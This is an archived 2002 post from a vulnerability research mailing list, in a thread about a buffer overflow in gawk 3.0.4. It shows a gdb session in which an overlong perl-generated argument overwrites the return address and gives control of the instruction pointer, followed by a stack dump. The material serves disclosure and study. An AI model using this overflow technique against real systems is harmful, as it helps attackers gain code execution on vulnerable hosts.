Vulnerability Development mailing list archives
RE: Buffer overflow in awk
From: "dong-h0un U" <xploit () hackermail com>
Date: Sat, 16 Mar 2002 05:20:18 +0800
This puts last 'NULL byte' and change rule of program. Pico editer or snmpd did exploit by similar method. [x82@xpl017elz x82]$ gdb -q awk (no debugging symbols found)...(gdb) r -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"` Starting program: /bin/awk -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x 82\x82"` Program received signal SIGSEGV, Segmentation fault. 0x8282bab0 in ?? () (gdb) q The program is running. Exit anyway? (y or n) y [x82@xpl017elz x82]$ rpm -qa | grep awk gawk-3.0.4-1 [x82@xpl017elz x82]$ debugging: (gdb) ... 0xbfffd2b0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2c0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2d0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2e0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2f0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd300: 0x82828282 0x8282bab0 0xbfffd300 0x080538cc ~~ <- it's 0xbfffd310: 0xbfffdd46 0xbfffd390 0x080577e6 0xbfffdd46 0xbfffd320: 0xfffffffa 0x00000000 0x00000000 0x00000000 (gdb) x 0xbfffd304 0xbfffd304: 0x8282bab0 (gdb) fun! Sorry, I do not English. :-X -- by "you dong-hun"(Xpl017Elz), <szoahc () hotmail com>. -- Powered by Outblaze
Current thread:
- Re: Buffer overflow in awk, (continued)
- Re: Buffer overflow in awk wu2ftpd-ovich (Mar 15)
- Re: Buffer overflow in awk Enphourell Security (Mar 19)
- RE: Buffer overflow in awk Mike Batchelder (Mar 15)
- Re: Buffer overflow in awk sekure (Mar 15)
- Re: Buffer overflow in awk Kurt Seifried (Mar 15)
- Re: Buffer overflow in awk Pavel Kankovsky (Mar 17)
- Re: Buffer overflow in awk Jeff Fields (Mar 19)
- Re: Buffer overflow in awk Jirka Kosina (Mar 20)
- Re: Buffer overflow in awk sekure (Mar 15)
- Re: Buffer overflow in awk nilton . gs . sc (Mar 15)
- Re: Buffer overflow in awk Rui Miguel Silva Seabra (Mar 15)
- Re: Buffer overflow in awk Crist J. Clark (Mar 17)
- Re: Buffer overflow in awk Jose Nazario (Mar 18)
- RE: Buffer overflow in awk Hani Mustafa (Mar 24)
- Re: Buffer overflow in awk Elan Hasson (Mar 24)
- Re: Buffer overflow in awk Tim Gerritsen (Mar 24)
- Re: Buffer overflow in awk Replugge [ROD] (Mar 25)